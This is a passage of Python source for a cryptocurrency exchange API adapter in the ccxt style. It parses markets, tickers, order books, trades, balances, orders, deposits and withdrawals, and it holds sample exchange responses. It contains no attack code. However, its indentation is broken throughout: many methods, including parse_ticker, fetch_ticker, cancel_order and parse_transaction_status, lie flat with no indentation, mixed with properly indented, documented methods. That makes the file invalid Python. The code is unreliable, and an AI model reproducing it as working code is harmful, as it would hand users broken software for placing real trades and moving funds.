# 'buy-limit-must-less-than': 1.1,
# 'sell-limit-must-greater-than': 0.9,
# 'limit-order-must-greater-than': 1,
# 'limit-order-must-less-than': 5000000,
# 'market-buy-order-must-greater-than': 0.0001,
# 'market-buy-order-must-less-than': 100,
# 'market-sell-order-must-greater-than': 1,
# 'market-sell-order-must-less-than': 500000,
# 'circuit-break-when-greater-than': 10000,
# 'circuit-break-when-less-than': 10,
# 'market-sell-order-rate-must-less-than': 0.1,
# 'market-buy-order-rate-must-less-than': 0.1 }}
#
return self.parse_trading_limits(self.safe_value(response, 'data', {}))
def parse_trading_limits(self, limits, symbol=None, params={}):
#
# { symbol: "aidocbtc",
# 'buy-limit-must-less-than': 1.1,
# 'sell-limit-must-greater-than': 0.9,
# 'limit-order-must-greater-than': 1,
# 'limit-order-must-less-than': 5000000,
# 'market-buy-order-must-greater-than': 0.0001,
# 'market-buy-order-must-less-than': 100,
# 'market-sell-order-must-greater-than': 1,
# 'market-sell-order-must-less-than': 500000,
# 'circuit-break-when-greater-than': 10000,
# 'circuit-break-when-less-than': 10,
# 'market-sell-order-rate-must-less-than': 0.1,
# 'market-buy-order-rate-must-less-than': 0.1 }
#
return {
'info': limits,
'limits': {
'amount': {
'min': self.safe_float(limits, 'limit-order-must-greater-than'),
'max': self.safe_float(limits, 'limit-order-must-less-than'),
},
},
}
def cost_to_precision(self, symbol, cost):
return self.decimal_to_precision(cost, TRUNCATE, self.markets[symbol]['precision']['cost'], self.precisionMode)
    def fetch_markets(self, params={}):
        """Fetch all markets from the exchange and build unified market structures.

        The endpoint is configurable via self.options['fetchMarketsMethod']
        (publicGetCommonSymbols by default).

        :param dict params: extra parameters merged into the request
        :returns list: unified market structures
        :raises NetworkError: if the exchange returns an empty market list
        """
        method = self.options['fetchMarketsMethod']
        response = getattr(self, method)(params)
        markets = self.safe_value(response, 'data')
        numMarkets = len(markets)
        if numMarkets < 1:
            raise NetworkError(self.id + ' publicGetCommonSymbols returned empty response: ' + self.json(markets))
        result = []
        for i in range(0, len(markets)):
            market = markets[i]
            baseId = self.safe_string(market, 'base-currency')
            quoteId = self.safe_string(market, 'quote-currency')
            # the exchange market id is base and quote ids concatenated
            id = baseId + quoteId
            base = self.safe_currency_code(baseId)
            quote = self.safe_currency_code(quoteId)
            symbol = base + '/' + quote
            precision = {
                'amount': self.safe_integer(market, 'amount-precision'),
                'price': self.safe_integer(market, 'price-precision'),
                'cost': self.safe_integer(market, 'value-precision'),
            }
            # OMG markets trade fee-free here; everything else pays a flat 0.2%
            maker = 0 if (base == 'OMG') else 0.2 / 100
            taker = 0 if (base == 'OMG') else 0.2 / 100
            # fall back to one precision step when no explicit minimum is given
            minAmount = self.safe_float(market, 'min-order-amt', math.pow(10, -precision['amount']))
            maxAmount = self.safe_float(market, 'max-order-amt')
            minCost = self.safe_float(market, 'min-order-value', 0)
            state = self.safe_string(market, 'state')
            active = (state == 'online')
            result.append({
                'id': id,
                'symbol': symbol,
                'base': base,
                'quote': quote,
                'baseId': baseId,
                'quoteId': quoteId,
                'active': active,
                'precision': precision,
                'taker': taker,
                'maker': maker,
                'limits': {
                    'amount': {
                        'min': minAmount,
                        'max': maxAmount,
                    },
                    'price': {
                        'min': math.pow(10, -precision['price']),
                        'max': None,
                    },
                    'cost': {
                        'min': minCost,
                        'max': None,
                    },
                },
                'info': market,
            })
        return result
def parse_ticker(self, ticker, market=None):
#
# fetchTicker
#
# {
# "amount": 26228.672978342216,
# "open": 9078.95,
# "close": 9146.86,
# "high": 9155.41,
# "id": 209988544334,
# "count": 265846,
# "low": 8988.0,
# "version": 209988544334,
# "ask": [9146.87, 0.156134],
# "vol": 2.3822168242201668E8,
# "bid": [9146.86, 0.080758],
# }
#
# fetchTickers
# {
# symbol: "bhdht",
# open: 2.3938,
# high: 2.4151,
# low: 2.3323,
# close: 2.3909,
# amount: 628.992,
# vol: 1493.71841095,
# count: 2088,
# bid: 2.3643,
# bidSize: 0.7136,
# ask: 2.4061,
# askSize: 0.4156
# }
#
symbol = None
if market is not None:
symbol = market['symbol']
timestamp = self.safe_integer(ticker, 'ts')
bid = None
bidVolume = None
ask = None
askVolume = None
if 'bid' in ticker:
if isinstance(ticker['bid'], list):
bid = self.safe_float(ticker['bid'], 0)
bidVolume = self.safe_float(ticker['bid'], 1)
else:
bid = self.safe_float(ticker, 'bid')
bidVolume = self.safe_value(ticker, 'bidSize')
if 'ask' in ticker:
if isinstance(ticker['ask'], list):
ask = self.safe_float(ticker['ask'], 0)
askVolume = self.safe_float(ticker['ask'], 1)
else:
ask = self.safe_float(ticker, 'ask')
askVolume = self.safe_value(ticker, 'askSize')
open = self.safe_float(ticker, 'open')
close = self.safe_float(ticker, 'close')
change = None
percentage = None
average = None
if (open is not None) and (close is not None):
change = close - open
average = self.sum(open, close) / 2
if (close is not None) and (close > 0):
percentage = (change / open) * 100
baseVolume = self.safe_float(ticker, 'amount')
quoteVolume = self.safe_float(ticker, 'vol')
vwap = self.vwap(baseVolume, quoteVolume)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': bid,
'bidVolume': bidVolume,
'ask': ask,
'askVolume': askVolume,
'vwap': vwap,
'open': open,
'close': close,
'last': close,
'previousClose': None,
'change': change,
'percentage': percentage,
'average': average,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
    def fetch_order_book(self, symbol, limit=None, params={}):
        """Fetch the order book for a symbol.

        :param str symbol: unified market symbol
        :param int limit: accepted for interface compatibility but not sent
            (the endpoint returns the full step0 book)
        :param dict params: extra parameters merged into the request
        :returns dict: unified order book with 'nonce' set from tick.version
        :raises BadSymbol: when the exchange returns an empty 'tick'
        :raises ExchangeError: when the response carries no 'tick' key at all
        """
        self.load_markets()
        market = self.market(symbol)
        request = {
            'symbol': market['id'],
            'type': 'step0',  # step0 = raw book without price aggregation
        }
        response = self.marketGetDepth(self.extend(request, params))
        #
        #     {
        #         "status": "ok",
        #         "ch": "market.btcusdt.depth.step0",
        #         "ts": 1583474832790,
        #         "tick": {
        #             "bids": [
        #                 [9100.290000000000000000, 0.200000000000000000],
        #                 [9099.820000000000000000, 0.200000000000000000],
        #                 [9099.610000000000000000, 0.205000000000000000],
        #             ],
        #             "asks": [
        #                 [9100.640000000000000000, 0.005904000000000000],
        #                 [9101.010000000000000000, 0.287311000000000000],
        #                 [9101.030000000000000000, 0.012121000000000000],
        #             ],
        #             "ts":1583474832008,
        #             "version":104999698780
        #         }
        #     }
        #
        if 'tick' in response:
            if not response['tick']:
                raise BadSymbol(self.id + ' fetchOrderBook() returned empty response: ' + self.json(response))
            tick = self.safe_value(response, 'tick')
            # prefer the tick-level timestamp, fall back to the response-level one
            timestamp = self.safe_integer(tick, 'ts', self.safe_integer(response, 'ts'))
            result = self.parse_order_book(tick, timestamp)
            result['nonce'] = self.safe_integer(tick, 'version')
            return result
        raise ExchangeError(self.id + ' fetchOrderBook() returned unrecognized response: ' + self.json(response))
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetDetailMerged(self.extend(request, params))
#
# {
# "status": "ok",
# "ch": "market.btcusdt.detail.merged",
# "ts": 1583494336669,
# "tick": {
# "amount": 26228.672978342216,
# "open": 9078.95,
# "close": 9146.86,
# "high": 9155.41,
# "id": 209988544334,
# "count": 265846,
# "low": 8988.0,
# "version": 209988544334,
# "ask": [9146.87, 0.156134],
# "vol": 2.3822168242201668E8,
# "bid": [9146.86, 0.080758],
# }
# }
#
ticker = self.parse_ticker(response['tick'], market)
timestamp = self.safe_value(response, 'ts')
ticker['timestamp'] = timestamp
ticker['datetime'] = self.iso8601(timestamp)
return ticker
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.marketGetTickers(params)
tickers = self.safe_value(response, 'data')
timestamp = self.safe_integer(response, 'ts')
result = {}
for i in range(0, len(tickers)):
marketId = self.safe_string(tickers[i], 'symbol')
market = self.safe_market(marketId)
symbol = market['symbol']
ticker = self.parse_ticker(tickers[i], market)
ticker['timestamp'] = timestamp
ticker['datetime'] = self.iso8601(timestamp)
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
    def parse_trade(self, trade, market=None):
        """Parse a raw trade(public or private) into the unified trade structure.

        Public trades(fetchTrades) look like:

            {"amount": 0.010411, "trade-id": 102090736910,
             "ts": 1583497692182, "id": 10500517034273194594947,
             "price": 9096.05, "direction": "sell"}

        Private trades(fetchMyTrades) look like:

            {'symbol': 'swftcbtc', 'fee-currency': 'swftc', 'filled-fees': '0',
             'source': 'spot-api', 'id': 83789509854000, 'type': 'buy-limit',
             'order-id': 83711103204909, 'filled-points': '0.005826843283532154',
             'fee-deduct-currency': 'ht', 'filled-amount': '45941.53',
             'price': '0.0000001401', 'created-at': 1597933260729,
             'match-id': 100087455560, 'role': 'maker', 'trade-id': 100050305348}

        :param dict trade: raw trade payload
        :param dict market: unified market structure, if known
        :returns dict: unified trade
        """
        marketId = self.safe_string(trade, 'symbol')
        symbol = self.safe_symbol(marketId, market)
        timestamp = self.safe_integer_2(trade, 'ts', 'created-at')
        order = self.safe_string(trade, 'order-id')
        side = self.safe_string(trade, 'direction')
        type = self.safe_string(trade, 'type')
        if type is not None:
            # private trades encode side and type together, e.g. 'buy-limit'
            typeParts = type.split('-')
            side = typeParts[0]
            type = typeParts[1]
        takerOrMaker = self.safe_string(trade, 'role')
        price = self.safe_float(trade, 'price')
        amount = self.safe_float_2(trade, 'filled-amount', 'amount')
        cost = None
        if price is not None:
            if amount is not None:
                cost = amount * price
        fee = None
        feeCost = self.safe_float(trade, 'filled-fees')
        feeCurrency = None
        if market is not None:
            feeCurrency = self.safe_currency_code(self.safe_string(trade, 'fee-currency'))
        # when the fee was paid in points, 'filled-fees' is zero and the
        # actual fee lives in 'filled-points' / 'fee-deduct-currency'
        filledPoints = self.safe_float(trade, 'filled-points')
        if filledPoints is not None:
            if (feeCost is None) or (feeCost == 0.0):
                feeCost = filledPoints
                feeCurrency = self.safe_currency_code(self.safe_string(trade, 'fee-deduct-currency'))
        if feeCost is not None:
            fee = {
                'cost': feeCost,
                'currency': feeCurrency,
            }
        tradeId = self.safe_string_2(trade, 'trade-id', 'tradeId')
        id = self.safe_string(trade, 'id', tradeId)
        return {
            'id': id,
            'info': trade,
            'order': order,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'symbol': symbol,
            'type': type,
            'side': side,
            'takerOrMaker': takerOrMaker,
            'price': price,
            'amount': amount,
            'cost': cost,
            'fee': fee,
        }
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = None
request = {}
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
if limit is not None:
request['size'] = limit # 1-100 orders, default is 100
if since is not None:
request['start-date'] = self.ymd(since) # maximum query window size is 2 days, query window shift should be within past 120 days
response = self.privateGetOrderMatchresults(self.extend(request, params))
trades = self.parse_trades(response['data'], market, since, limit)
return trades
def fetch_trades(self, symbol, since=None, limit=1000, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
if limit is not None:
request['size'] = limit
response = self.marketGetHistoryTrade(self.extend(request, params))
#
# {
# "status": "ok",
# "ch": "market.btcusdt.trade.detail",
# "ts": 1583497692365,
# "data": [
# {
# "id": 105005170342,
# "ts": 1583497692182,
# "data": [
# {
# "amount": 0.010411000000000000,
# "trade-id": 102090736910,
# "ts": 1583497692182,
# "id": 10500517034273194594947,
# "price": 9096.050000000000000000,
# "direction": "sell"
# }
# ]
# },
# # ...
# ]
# }
#
data = self.safe_value(response, 'data')
result = []
for i in range(0, len(data)):
trades = self.safe_value(data[i], 'data', [])
for j in range(0, len(trades)):
trade = self.parse_trade(trades[j], market)
result.append(trade)
result = self.sort_by(result, 'timestamp')
return self.filter_by_symbol_since_limit(result, symbol, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "amount":1.2082,
# "open":0.025096,
# "close":0.025095,
# "high":0.025096,
# "id":1591515300,
# "count":6,
# "low":0.025095,
# "vol":0.0303205097
# }
#
return [
self.safe_timestamp(ohlcv, 'id'),
self.safe_float(ohlcv, 'open'),
self.safe_float(ohlcv, 'high'),
self.safe_float(ohlcv, 'low'),
self.safe_float(ohlcv, 'close'),
self.safe_float(ohlcv, 'amount'),
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=1000, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'period': self.timeframes[timeframe],
}
if limit is not None:
request['size'] = limit
response = self.marketGetHistoryKline(self.extend(request, params))
#
# {
# "status":"ok",
# "ch":"market.ethbtc.kline.1min",
# "ts":1591515374371,
# "data":[
# {"amount":0.0,"open":0.025095,"close":0.025095,"high":0.025095,"id":1591515360,"count":0,"low":0.025095,"vol":0.0},
# {"amount":1.2082,"open":0.025096,"close":0.025095,"high":0.025096,"id":1591515300,"count":6,"low":0.025095,"vol":0.0303205097},
# {"amount":0.0648,"open":0.025096,"close":0.025096,"high":0.025096,"id":1591515240,"count":2,"low":0.025096,"vol":0.0016262208},
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_ohlcvs(data, market, timeframe, since, limit)
def fetch_accounts(self, params={}):
self.load_markets()
response = self.privateGetAccountAccounts(params)
return response['data']
    def fetch_currencies(self, params={}):
        """Fetch all currencies supported by the exchange and build unified
        currency structures.

        NOTE(review): `precision` comes straight from 'withdraw-precision';
        if the exchange ever omits that field, the math.pow calls below
        would fail on None - confirm the field is always present.

        :param dict params: extra parameters merged into the request
        :returns dict: unified currency structures keyed by currency code
        """
        request = {
            'language': self.options['language'],
        }
        response = self.publicGetSettingsCurrencys(self.extend(request, params))
        currencies = self.safe_value(response, 'data')
        result = {}
        for i in range(0, len(currencies)):
            currency = currencies[i]
            #
            #     {name: "ctxc",
            #      'display-name': "CTXC",
            #      'withdraw-precision': 8,
            #      'currency-type': "eth",
            #      'currency-partition': "pro",
            #      'support-sites': null,
            #      'otc-enable': 0,
            #      'deposit-min-amount': "2",
            #      'withdraw-min-amount': "4",
            #      'show-precision': "8",
            #      weight: "2988",
            #      visible: True,
            #      'deposit-desc': "Please don't deposit any other digital assets except CTXC...",
            #      'withdraw-desc': "Minimum withdrawal amount: 4 CTXC. For security reason...",
            #      'deposit-enabled': True,
            #      'withdraw-enabled': True,
            #      'currency-addr-with-tag': False,
            #      'fast-confirms': 15,
            #      'safe-confirms': 30}
            #
            id = self.safe_value(currency, 'name')
            precision = self.safe_integer(currency, 'withdraw-precision')
            code = self.safe_currency_code(id)
            # a currency is active only if it is visible AND both deposit
            # and withdrawal are enabled
            active = currency['visible'] and currency['deposit-enabled'] and currency['withdraw-enabled']
            name = self.safe_string(currency, 'display-name')
            result[code] = {
                'id': id,
                'code': code,
                'type': 'crypto',
                # 'payin': currency['deposit-enabled'],
                # 'payout': currency['withdraw-enabled'],
                # 'transfer': None,
                'name': name,
                'active': active,
                'fee': None,  # todo need to fetch from fee endpoint
                'precision': precision,
                'limits': {
                    'amount': {
                        'min': math.pow(10, -precision),
                        'max': math.pow(10, precision),
                    },
                    'price': {
                        'min': math.pow(10, -precision),
                        'max': math.pow(10, precision),
                    },
                    'cost': {
                        'min': None,
                        'max': None,
                    },
                    'deposit': {
                        'min': self.safe_float(currency, 'deposit-min-amount'),
                        'max': math.pow(10, precision),
                    },
                    'withdraw': {
                        'min': self.safe_float(currency, 'withdraw-min-amount'),
                        'max': math.pow(10, precision),
                    },
                },
                'info': currency,
            }
        return result
    def fetch_balance(self, params={}):
        """Fetch account balances for the first loaded account.

        The exchange reports each currency as separate 'trade'(available)
        and 'frozen'(locked) entries under response['data']['list']; the
        two are merged into a single unified account per currency code.

        :param dict params: extra parameters merged into the request
        :returns dict: unified balance structure
        """
        self.load_markets()
        self.load_accounts()
        method = self.options['fetchBalanceMethod']
        request = {
            'id': self.accounts[0]['id'],  # balances are per-account; query the first
        }
        response = getattr(self, method)(self.extend(request, params))
        balances = self.safe_value(response['data'], 'list', [])
        result = {'info': response}
        for i in range(0, len(balances)):
            balance = balances[i]
            currencyId = self.safe_string(balance, 'currency')
            code = self.safe_currency_code(currencyId)
            account = None
            # reuse the account if this code was already seen(trade + frozen rows)
            if code in result:
                account = result[code]
            else:
                account = self.account()
            if balance['type'] == 'trade':
                account['free'] = self.safe_float(balance, 'balance')
            if balance['type'] == 'frozen':
                account['used'] = self.safe_float(balance, 'balance')
            result[code] = account
        return self.parse_balance(result)
def fetch_orders_by_states(self, states, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {
'states': states,
}
market = None
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
method = self.safe_string(self.options, 'fetchOrdersByStatesMethod', 'private_get_order_orders')
response = getattr(self, method)(self.extend(request, params))
#
# {status: "ok",
# data: [{ id: 13997833014,
# symbol: "ethbtc",
# 'account-id': 3398321,
# amount: "0.045000000000000000",
# price: "0.034014000000000000",
# 'created-at': 1545836976871,
# type: "sell-limit",
# 'field-amount': "0.045000000000000000",
# 'field-cash-amount': "0.001530630000000000",
# 'field-fees': "0.000003061260000000",
# 'finished-at': 1545837948214,
# source: "spot-api",
# state: "filled",
# 'canceled-at': 0 } ]}
#
return self.parse_orders(response['data'], market, since, limit)
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'id': id,
}
response = self.privateGetOrderOrdersId(self.extend(request, params))
order = self.safe_value(response, 'data')
return self.parse_order(order)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_by_states('pre-submitted,submitted,partial-filled,filled,partial-canceled,canceled', symbol, since, limit, params)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
method = self.safe_string(self.options, 'fetchOpenOrdersMethod', 'fetch_open_orders_v1')
return getattr(self, method)(symbol, since, limit, params)
def fetch_open_orders_v1(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrdersV1 requires a symbol argument')
return self.fetch_orders_by_states('pre-submitted,submitted,partial-filled', symbol, since, limit, params)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_by_states('filled,partial-canceled,canceled', symbol, since, limit, params)
    def fetch_open_orders_v2(self, symbol=None, since=None, limit=None, params={}):
        """Fetch open orders via the dedicated openOrders endpoint(v2).

        The endpoint requires an account id; if 'account-id' is not supplied
        in params, the first 'spot' account is used.

        :param str symbol: unified market symbol(required)
        :param int since: unused by the endpoint, applied by parse_orders
        :param int limit: max number of orders to return
        :param dict params: extra parameters; may include 'account-id'
        :raises ArgumentsRequired: when symbol is None
        """
        self.load_markets()
        if symbol is None:
            raise ArgumentsRequired(self.id + ' fetchOpenOrders requires a symbol argument')
        market = self.market(symbol)
        accountId = self.safe_string(params, 'account-id')
        if accountId is None:
            # pick the first spot account
            self.load_accounts()
            for i in range(0, len(self.accounts)):
                account = self.accounts[i]
                if account['type'] == 'spot':
                    accountId = self.safe_string(account, 'id')
                    if accountId is not None:
                        break
        request = {
            'symbol': market['id'],
            'account-id': accountId,
        }
        if limit is not None:
            request['size'] = limit
        # 'account-id' was consumed above, do not send it twice
        omitted = self.omit(params, 'account-id')
        response = self.privateGetOrderOpenOrders(self.extend(request, omitted))
        #
        #     {
        #         "status":"ok",
        #         "data":[
        #             {
        #                 "symbol":"ethusdt",
        #                 "source":"api",
        #                 "amount":"0.010000000000000000",
        #                 "account-id":1528640,
        #                 "created-at":1561597491963,
        #                 "price":"400.000000000000000000",
        #                 "filled-amount":"0.0",
        #                 "filled-cash-amount":"0.0",
        #                 "filled-fees":"0.0",
        #                 "id":38477101630,
        #                 "state":"submitted",
        #                 "type":"sell-limit"
        #             }
        #         ]
        #     }
        #
        data = self.safe_value(response, 'data', [])
        return self.parse_orders(data, market, since, limit)
def parse_order_status(self, status):
statuses = {
'partial-filled': 'open',
'partial-canceled': 'canceled',
'filled': 'closed',
'canceled': 'canceled',
'submitted': 'open',
}
return self.safe_string(statuses, status, status)
    def parse_order(self, order, market=None):
        """Parse a raw exchange order into the unified order structure.

        Raw orders look like:

            {id: 13997833014, symbol: "ethbtc", 'account-id': 3398321,
             amount: "0.045000000000000000", price: "0.034014000000000000",
             'created-at': 1545836976871, type: "sell-limit",
             'field-amount': "0.045000000000000000",        # fixed later to filled-amount
             'field-cash-amount': "0.001530630000000000",   # fixed later to filled-cash-amount
             'field-fees': "0.000003061260000000",          # fixed later to filled-fees
             'finished-at': 1545837948214, source: "spot-api",
             state: "filled", 'canceled-at': 0}

        For market buys, price comes back as "0.0" and amount is the quote
        cost, so both fields need special handling below.

        :param dict order: raw order payload
        :param dict market: unified market structure, if known
        :returns dict: unified order
        """
        id = self.safe_string(order, 'id')
        side = None
        type = None
        status = None
        if 'type' in order:
            # the exchange encodes side and type together, e.g. 'sell-limit'
            orderType = order['type'].split('-')
            side = orderType[0]
            type = orderType[1]
        status = self.parse_order_status(self.safe_string(order, 'state'))
        marketId = self.safe_string(order, 'symbol')
        symbol = self.safe_symbol(marketId, market)
        timestamp = self.safe_integer(order, 'created-at')
        amount = self.safe_float(order, 'amount')
        filled = self.safe_float_2(order, 'filled-amount', 'field-amount')  # typo in their API, filled amount
        if (type == 'market') and (side == 'buy'):
            # for market buys the raw 'amount' is the quote cost, not the
            # base amount - use the filled amount once the order is closed
            amount = filled if (status == 'closed') else None
        price = self.safe_float(order, 'price')
        if price == 0.0:
            # market orders report price 0.0, which means "no price"
            price = None
        cost = self.safe_float_2(order, 'filled-cash-amount', 'field-cash-amount')  # same typo
        remaining = None
        average = None
        if filled is not None:
            if amount is not None:
                remaining = amount - filled
            # if cost is defined and filled is not zero
            if (cost is not None) and (filled > 0):
                average = cost / filled
        feeCost = self.safe_float_2(order, 'filled-fees', 'field-fees')  # typo in their API, filled fees
        fee = None
        if feeCost is not None:
            feeCurrency = None
            if market is not None:
                # fees are charged in the received currency: quote on sells,
                # base on buys
                feeCurrency = market['quote'] if (side == 'sell') else market['base']
            fee = {
                'cost': feeCost,
                'currency': feeCurrency,
            }
        return {
            'info': order,
            'id': id,
            'clientOrderId': None,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'lastTradeTimestamp': None,
            'symbol': symbol,
            'type': type,
            'timeInForce': None,
            'side': side,
            'price': price,
            'stopPrice': None,
            'average': average,
            'cost': cost,
            'amount': amount,
            'filled': filled,
            'remaining': remaining,
            'status': status,
            'fee': fee,
            'trades': None,
        }
    def create_order(self, symbol, type, side, amount, price=None, params={}):
        """Place an order.

        For market buys the exchange expects the *cost*(quote amount) in the
        'amount' field; by default this is computed as amount * price, which
        requires a price argument(see createMarketBuyOrderRequiresPrice).

        :param str symbol: unified market symbol
        :param str type: 'limit', 'market', 'ioc' or 'limit-maker'
        :param str side: 'buy' or 'sell'
        :param float amount: base amount(or quote cost for market buys when
            createMarketBuyOrderRequiresPrice is disabled)
        :param float price: required for limit-like orders and, by default,
            for market buys
        :param dict params: extra parameters merged into the request
        :raises InvalidOrder: for a market buy without a price while
            createMarketBuyOrderRequiresPrice is enabled
        :returns dict: a minimal unified order(only id/timestamp are known)
        """
        self.load_markets()
        self.load_accounts()
        market = self.market(symbol)
        request = {
            'account-id': self.accounts[0]['id'],
            'symbol': market['id'],
            'type': side + '-' + type,  # exchange order type is side and type combined
        }
        if (type == 'market') and (side == 'buy'):
            if self.options['createMarketBuyOrderRequiresPrice']:
                if price is None:
                    raise InvalidOrder(self.id + " market buy order requires price argument to calculate cost(total amount of quote currency to spend for buying, amount * price). To switch off self warning exception and specify cost in the amount argument, set .options['createMarketBuyOrderRequiresPrice'] = False. Make sure you know what you're doing.")
                else:
                    # despite that cost = amount * price is in quote currency and should have quote precision
                    # the exchange API requires the cost supplied in 'amount' to be of base precision
                    # more about it here:
                    # https://github.com/ccxt/ccxt/pull/4395
                    # https://github.com/ccxt/ccxt/issues/7611
                    # we use amountToPrecision here because the exchange requires cost in base precision
                    request['amount'] = self.cost_to_precision(symbol, float(amount) * float(price))
            else:
                request['amount'] = self.cost_to_precision(symbol, amount)
        else:
            request['amount'] = self.amount_to_precision(symbol, amount)
        if type == 'limit' or type == 'ioc' or type == 'limit-maker':
            request['price'] = self.price_to_precision(symbol, price)
        method = self.options['createOrderMethod']
        response = getattr(self, method)(self.extend(request, params))
        timestamp = self.milliseconds()
        id = self.safe_string(response, 'data')
        return {
            'info': response,
            'id': id,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'lastTradeTimestamp': None,
            'status': None,
            'symbol': symbol,
            'type': type,
            'side': side,
            'price': price,
            'amount': amount,
            'filled': None,
            'remaining': None,
            'cost': None,
            'trades': None,
            'fee': None,
            'clientOrderId': None,
            'average': None,
        }
def cancel_order(self, id, symbol=None, params={}):
response = self.privatePostOrderOrdersIdSubmitcancel({'id': id})
#
# response = {
# 'status': 'ok',
# 'data': '10138899000',
# }
#
return self.extend(self.parse_order(response), {
'id': id,
'status': 'canceled',
})
def currency_to_precision(self, currency, fee):
return self.decimal_to_precision(fee, 0, self.currencies[currency]['precision'])
def calculate_fee(self, symbol, type, side, amount, price, takerOrMaker='taker', params={}):
market = self.markets[symbol]
rate = market[takerOrMaker]
cost = amount * rate
key = 'quote'
if side == 'sell':
cost *= price
else:
key = 'base'
return {
'type': takerOrMaker,
'currency': market[key],
'rate': rate,
'cost': float(self.currency_to_precision(market[key], cost)),
}
def parse_deposit_address(self, depositAddress, currency=None):
#
# {
# currency: "eth",
# address: "0xf7292eb9ba7bc50358e27f0e025a4d225a64127b",
# addressTag: "",
# chain: "eth"
# }
#
address = self.safe_string(depositAddress, 'address')
tag = self.safe_string(depositAddress, 'addressTag')
currencyId = self.safe_string(depositAddress, 'currency')
code = self.safe_currency_code(currencyId)
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': depositAddress,
}
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.v2PrivateGetAccountDepositAddress(self.extend(request, params))
#
# {
# code: 200,
# data: [
# {
# currency: "eth",
# address: "0xf7292eb9ba7bc50358e27f0e025a4d225a64127b",
# addressTag: "",
# chain: "eth"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_deposit_address(self.safe_value(data, 0, {}), currency)
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
if limit is None or limit > 100:
limit = 100
self.load_markets()
currency = None
if code is not None:
currency = self.currency(code)
request = {
'type': 'deposit',
'from': 0, # From 'id' ... if you want to get results after a particular transaction id, pass the id in params.from
}
if currency is not None:
request['currency'] = currency['id']
if limit is not None:
request['size'] = limit # max 100
response = self.privateGetQueryDepositWithdraw(self.extend(request, params))
# return response
return self.parse_transactions(response['data'], currency, since, limit)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
if limit is None or limit > 100:
limit = 100
self.load_markets()
currency = None
if code is not None:
currency = self.currency(code)
request = {
'type': 'withdraw',
'from': 0, # From 'id' ... if you want to get results after a particular transaction id, pass the id in params.from
}
if currency is not None:
request['currency'] = currency['id']
if limit is not None:
request['size'] = limit # max 100
response = self.privateGetQueryDepositWithdraw(self.extend(request, params))
# return response
return self.parse_transactions(response['data'], currency, since, limit)
    def parse_transaction(self, transaction, currency=None):
        """Parse a raw deposit or withdrawal record into the unified
        transaction structure.

        Deposits(fetchDeposits) look like:

            {'id': 8211029, 'type': 'deposit', 'currency': 'eth',
             'chain': 'eth', 'tx-hash': 'bd315....', 'amount': 0.81162421,
             'address': '4b8b....', 'address-tag': '', 'fee': 0,
             'state': 'safe', 'created-at': 1542180380965,
             'updated-at': 1542180788077}

        Withdrawals(fetchWithdrawals) look like:

            {'id': 6908275, 'type': 'withdraw', 'currency': 'btc',
             'chain': 'btc', 'tx-hash': 'c1a1a....', 'amount': 0.80257005,
             'address': '1QR....', 'address-tag': '', 'fee': 0.0005,
             'state': 'confirmed', 'created-at': 1552107295685,
             'updated-at': 1552108032859}

        :param dict transaction: raw transaction payload
        :param dict currency: unified currency structure(unused; the code is
            derived from the payload itself)
        :returns dict: unified transaction
        """
        timestamp = self.safe_integer(transaction, 'created-at')
        updated = self.safe_integer(transaction, 'updated-at')
        code = self.safe_currency_code(self.safe_string(transaction, 'currency'))
        type = self.safe_string(transaction, 'type')
        if type == 'withdraw':
            # unified type name is 'withdrawal'
            type = 'withdrawal'
        status = self.parse_transaction_status(self.safe_string(transaction, 'state'))
        tag = self.safe_string(transaction, 'address-tag')
        feeCost = self.safe_float(transaction, 'fee')
        if feeCost is not None:
            # normalize potentially negative fee values
            feeCost = abs(feeCost)
        return {
            'info': transaction,
            'id': self.safe_string(transaction, 'id'),
            'txid': self.safe_string(transaction, 'tx-hash'),
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'address': self.safe_string(transaction, 'address'),
            'tag': tag,
            'type': type,
            'amount': self.safe_float(transaction, 'amount'),
            'currency': code,
            'status': status,
            'updated': updated,
            'fee': {
                'currency': code,
                'cost': feeCost,
                'rate': None,
            },
        }
def parse_transaction_status(self, status):
statuses = {
# deposit statuses
'unknown': 'failed',
'confirming': 'pending',
'confirmed': 'ok',
'safe': 'ok',
'orphan': 'failed',
# withdrawal statuses
'submitted': 'pending',
'canceled': 'canceled',
'reexamine': 'pending',
'reject': 'failed',
'pass': 'pending',
'wallet-reject': 'failed',
# 'confirmed': 'ok', # present in deposit statuses
'confirm-error': 'failed',
'repealed': 'failed',
'wallet-transfer': 'pending',
'pre-transfer': 'pending',
}
return self.safe_string(statuses, status, status)
